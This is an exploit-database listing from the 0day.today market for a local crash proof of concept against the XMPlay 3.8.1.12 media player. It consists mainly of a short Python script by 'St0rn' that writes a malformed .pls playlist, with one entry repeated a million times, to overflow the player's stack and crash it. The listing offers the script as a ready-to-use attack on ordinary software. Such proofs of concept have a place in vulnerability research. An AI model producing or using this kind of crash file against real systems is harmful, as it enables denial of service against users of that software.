[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XMPlay 3.8.1.12 - .pls Local Crash PoC

Author
St0rn
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24063
Category
dos / poc
Date add
17-08-2015
Platform
windows
#!/usr/bin/env python
#
# Exploit Title: XMPlay .pls Local Crash poc
# Date: 2015-08-16
# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>
# Twitter: st0rnpentest
#
# Vendor Homepage: http://www.un4seen.com/
# Software Link:   http://www.un4seen.com/download.php?xmplay38
# Version: 3.8.1.12
# Tested on: Windows 7
#
 
 
# Stack Overflowing xmplay, but we can't 
# rewrite any register ou SE Handler
 
def generateCrash():
 crash="""
numberofentries=1
file1="""
 
 crash+="pwned"*1000000
 return crash
 
 
 
try:
 f=open("xmplay.pls","w")
 f.write(generateCrash())
 f.close
 print "Evil xmplay.pls generated!"
except:
 print "I can't create file :/"

#  0day.today [2024-12-24]  #